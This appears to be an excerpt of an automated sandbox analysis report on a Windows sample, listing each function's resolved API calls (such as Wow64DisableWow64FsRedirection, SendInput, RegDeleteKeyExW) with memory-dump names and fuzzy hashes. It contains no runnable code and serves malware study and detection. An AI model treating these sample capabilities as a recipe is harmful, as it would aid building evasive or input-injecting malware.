LoadLibraryA.KERNEL32(kernel32.dll,?,010421FB,?,010423EF), ref: 01042213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 01042225

Strings

kernel32.dll, xrefs: 0104220E
GetProcessId, xrefs: 0104221F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: db52664e91e5fa2523b66a95680190cdb1367592871e805ed20fe85f23e43269
Instruction ID: 7c5fd90a02e24b578bfcf88919e78604d3003afd015de1c70430decd57ec5a8d
Opcode Fuzzy Hash: db52664e91e5fa2523b66a95680190cdb1367592871e805ed20fe85f23e43269
Instruction Fuzzy Hash: 67D0A774600712FFDB714FB6F55860177D8EB09200B0044ADF8D1E6114D7B5D480D760

Function 00FE434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00FE41BB,00FE4341,?,00FE422F,?,00FE41BB,?,?,?,?,00FE39FE,?,00000001), ref: 00FE4359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FE436B

Strings

kernel32.dll, xrefs: 00FE4354
Wow64DisableWow64FsRedirection, xrefs: 00FE4365

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: bdccdd32af1572508fc6c2a98023d534cf7fd5b14ee30ca153b273c943cbe2e9
Instruction ID: 6d6ac4b041455dfc165ce0465f549f12fab45cecbe08765962bbc86c519062ee
Opcode Fuzzy Hash: bdccdd32af1572508fc6c2a98023d534cf7fd5b14ee30ca153b273c943cbe2e9
Instruction Fuzzy Hash: 06D0A730900712FFCB304F73E41C60276D8AB10725B00451DE4D1DA114D7B4E880AB10

Function 01020539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0102051D,?,010205FE), ref: 01020547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 01020559

Strings

oleaut32.dll, xrefs: 01020542
RegisterTypeLibForUser, xrefs: 01020553

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: b7f3049b027af8b10692c1c06fdc13020c512cabaf4f2fb638bfb3a37135d46c
Instruction ID: daf376495e8c6079cdb666a3018807e1faf43f84228f81185732fdb401fcedd4
Opcode Fuzzy Hash: b7f3049b027af8b10692c1c06fdc13020c512cabaf4f2fb638bfb3a37135d46c
Instruction Fuzzy Hash: 66D0A730500732FFDB308F66E42860276D8AB00301B50C46DF4C6D6118D6B5C4808750

Function 01020564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0102052F,?,010206D7), ref: 01020572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 01020584

Strings

oleaut32.dll, xrefs: 0102056D
UnRegisterTypeLibForUser, xrefs: 0102057E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: a475e3a525b0974188cc7a997901da0fdeea7140416ce12cc70f7e08c06abb77
Instruction ID: 50198b457e254da43d6a7d41f5f4c78883e609eaf1987c0f98f83730c34fe24a
Opcode Fuzzy Hash: a475e3a525b0974188cc7a997901da0fdeea7140416ce12cc70f7e08c06abb77
Instruction Fuzzy Hash: 80D09E71504732AADB605F66E428A427BD8AF04611B10856DE9D596118D7B4D4C09760

Function 0103ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0103ECBE,?,0103EBBB), ref: 0103ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0103ECE8

Strings

kernel32.dll, xrefs: 0103ECD1
GetSystemWow64DirectoryW, xrefs: 0103ECE2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: beaddcd6d55ac4f58f554fa1a4b0ba6ec8cbf7c2b18c764fb38f34aad098a2a5
Instruction ID: 51d7040eae59c5f395c5715c40fdf9b7b35596cb9a97ae81b9fcd93e45830ed5
Opcode Fuzzy Hash: beaddcd6d55ac4f58f554fa1a4b0ba6ec8cbf7c2b18c764fb38f34aad098a2a5
Instruction Fuzzy Hash: 93D0A730510723FFDF305FA6E4686067AECAB00600B00855DF8D5D6115DFB4C482A710

Function 01043BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,01043BD1,?,01043E06), ref: 01043BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01043BFB

Strings

RegDeleteKeyExW, xrefs: 01043BF5
advapi32.dll, xrefs: 01043BE4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 4fdf52cc6cc1aea0e7bb958c5d3d2912f5fc59680d7371c8bb4868389897fcd4
Instruction ID: 7389c0b9263d9959e203559f210a05d78756b451257db7d13b090d0cb4356fef
Opcode Fuzzy Hash: 4fdf52cc6cc1aea0e7bb958c5d3d2912f5fc59680d7371c8bb4868389897fcd4
Instruction Fuzzy Hash: FFD0A7F0500726EFDB305FE7E568603BEF8BB04214B20446DE4C5DA111D6F4C0808F50

Function 0103BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0103BAD3,00000001,0103B6EE,?,0107DC00), ref: 0103BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0103BAFD

Strings

kernel32.dll, xrefs: 0103BAE6
GetModuleHandleExW, xrefs: 0103BAF7

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 42df00f1461b3836bc02f373fff7262acd0dc3dae4f61526305ca39a1f67cb89
Instruction ID: 7cce8433a320ee449ab4ffca2c4c2cda0ff012f9b2e79d80182ac6a7ca042692
Opcode Fuzzy Hash: 42df00f1461b3836bc02f373fff7262acd0dc3dae4f61526305ca39a1f67cb89
Instruction Fuzzy Hash: 41D0A730900712EFDB346F66E458B1276DCAB40204B00445DE8D3D6118DBF4C480C710

Function 01019B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b8fe0408c34b8b4a37524043617400bf430af40e1d4c454cbbbcadf1dd7c45
Instruction ID: 4b20331c320a359a776a185410f44aa664e7289fc5afead3afebbf78027c9b37
Opcode Fuzzy Hash: 97b8fe0408c34b8b4a37524043617400bf430af40e1d4c454cbbbcadf1dd7c45
Instruction Fuzzy Hash: 85C17D75A0020AEFDB14DF94C8A4AAEBBF5FF48708F104598E981EB255D734DE41CB90

Function 0103AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0103AAB4
CoUninitialize.OLE32 ref: 0103AABF

Part of subcall function 01020213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102027B

VariantInit.OLEAUT32(?), ref: 0103AACA
VariantClear.OLEAUT32(?), ref: 0103AD9D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: f05e51dee94173182d26bb4a806815b2b2027c442476b9dd55baf4d3b594208c
Instruction ID: 575ffd817d11a4b3b4a33958b3ec124cbbd75f12b17ea4807ccf3ae29c6bd84a
Opcode Fuzzy Hash: f05e51dee94173182d26bb4a806815b2b2027c442476b9dd55baf4d3b594208c
Instruction Fuzzy Hash: A7A12635304701DFDB14EF19C895A6AB7E8BF89710F044849FADA9B3A2CB74E904CB95

Function 010191CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 010191DD
SysAllocString.OLEAUT32(?), ref: 01019286
VariantCopy.OLEAUT32 ref: 010192B5
VariantClear.OLEAUT32(?), ref: 010192DC

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 04eb33c54568fa2203497fe0b896671edb538ebdef134935ff0c4b20f39ca28e
Instruction ID: 226169c1bd30f5cbd762c52d1f60891d4835a8172b5a0be1042ef73aecc76bd4
Opcode Fuzzy Hash: 04eb33c54568fa2203497fe0b896671edb538ebdef134935ff0c4b20f39ca28e
Instruction Fuzzy Hash: D351A330A003069BDB649F7AD8A0A6EB7E5EF48318F10D81FE6C6CB2D5DB7C98409711

Function 0100365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 010036B7
_memcpy_s.LIBCMT ref: 01003729
__filbuf.LIBCMT ref: 010037AA
_memset.LIBCMT ref: 010037EE

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: ab059575030b20d5104a1d5b46ff9565e3fd8b0cb1f20a2913e7dc109fb0c7ad
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: B751EA70A007069FFB378F6DCC846AE7BE5BF44320F1487A9E9A99A2D0D77099508B40

Function 0104C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00A669F8,?), ref: 0104C544
ScreenToClient.USER32(?,00000002), ref: 0104C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0104C5DA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: ea7d90e712463a140b092b037708bca1b7122a42e732d642f8eb1e89fd53c391
Instruction ID: 446f40966cbd842912ab51039717719cde11fd0e665223f775ee7f93fb67639c
Opcode Fuzzy Hash: ea7d90e712463a140b092b037708bca1b7122a42e732d642f8eb1e89fd53c391
Instruction Fuzzy Hash: 65515EB5A01204EFDF21DF68C9C09AE7BB5EB49360F1082A9F99597291D730E981CB90

Function 0101C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0101C462
__itow.LIBCMT ref: 0101C49C

Part of subcall function 0101C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0101C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0101C505
__itow.LIBCMT ref: 0101C55A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: a29f0f5a7e73d03c361fbf5113f3522f4905af93429d3a913abc4e9b70c6fc90
Instruction ID: 6ea20cc7ff063e771bd07d6a2eb42f2f3e17d235aaee88532b4a71b9dabea698
Opcode Fuzzy Hash: a29f0f5a7e73d03c361fbf5113f3522f4905af93429d3a913abc4e9b70c6fc90
Instruction Fuzzy Hash: 6341E571A40249AFEF21DF59CD41BEE7BB9AF48704F000059FA45A7281DB7CDA45CBA1

Function 0102390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01023966
SetKeyboardState.USER32(00000080,?,00000001), ref: 01023982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 010239EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 01023A4D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 50db7d83b5fb8632172561f8865a419ef38332d0242728176541f9493c210112
Instruction ID: 9b5b3ef4fc868b4280ff385b0efd6d4b5915c4fa23aa9698f7890e9a6147fe7c
Opcode Fuzzy Hash: 50db7d83b5fb8632172561f8865a419ef38332d0242728176541f9493c210112
Instruction Fuzzy Hash: 61413930F00228AAFF719B6888057FDBBF5BB4E310F04019AE5C19A1C1C77D8984D765

Function 0102E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0102E742
GetLastError.KERNEL32(?,00000000), ref: 0102E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0102E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0102E7B9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 2eea4390f2a2cf85e305ebc54afe790b2bf11316507eb1bc7d8f86a59bb91c63
Instruction ID: 45ef54bd5d2f3610502c32ca32be08e3ad5d8efbe843cff0ce842cea1eab05ab
Opcode Fuzzy Hash: 2eea4390f2a2cf85e305ebc54afe790b2bf11316507eb1bc7d8f86a59bb91c63
Instruction Fuzzy Hash: 0A415A39200650DFCF11EF56C944A5DBBE5BF59720B098099E996AB3A2CB78FC00DB91

Function 0104B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0104B5D1

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: c021d8cb00c89cc55db5f68caba4edd7846b2aa0cef3cc789f5856aef43b0756
Instruction ID: b715344cf70d7947602bbf5265d00360d111f973bd82c6e20eb9317a300e93d0
Opcode Fuzzy Hash: c021d8cb00c89cc55db5f68caba4edd7846b2aa0cef3cc789f5856aef43b0756
Instruction Fuzzy Hash: A531D0B4600204BFEB309E5CC8C4FECBBA5AB09350F944161F7D5D61E1CA39E5408B91

Function 0104D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0104D807
GetWindowRect.USER32(?,?), ref: 0104D87D
PtInRect.USER32(?,?,0104ED5A), ref: 0104D88D
MessageBeep.USER32(00000000), ref: 0104D8FE

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: d3f48de04e83a1b5853c4aa64b398385130c6dbff9af611e38bbdb9cf69c9170
Instruction ID: 8346e9ab187368b19db6aab4de2b12ee1db181e222bb365b26291d8536016b16
Opcode Fuzzy Hash: d3f48de04e83a1b5853c4aa64b398385130c6dbff9af611e38bbdb9cf69c9170
Instruction Fuzzy Hash: 2B41A7B4A00209DFEB22CF98C4C4AA9BBF5BB59350F1881B9E988DB255D331E941CB50

Function 01023A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 01023AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 01023AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 01023B34
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 01023B92

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 237e28c3910d2a266e1e91c8d23c66aefea560aedc458e9d20b42ee129849260
Instruction ID: 1538fe436475ee79ac86067d83eb2be41024a2a20e4191a7f6836486f5defea1
Opcode Fuzzy Hash: 237e28c3910d2a266e1e91c8d23c66aefea560aedc458e9d20b42ee129849260
Instruction Fuzzy Hash: 37310630A00268AEFF329FA888187FE7FE5AB5D311F04019AE6C19B1D1C77D8A45D765

Function 01014004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

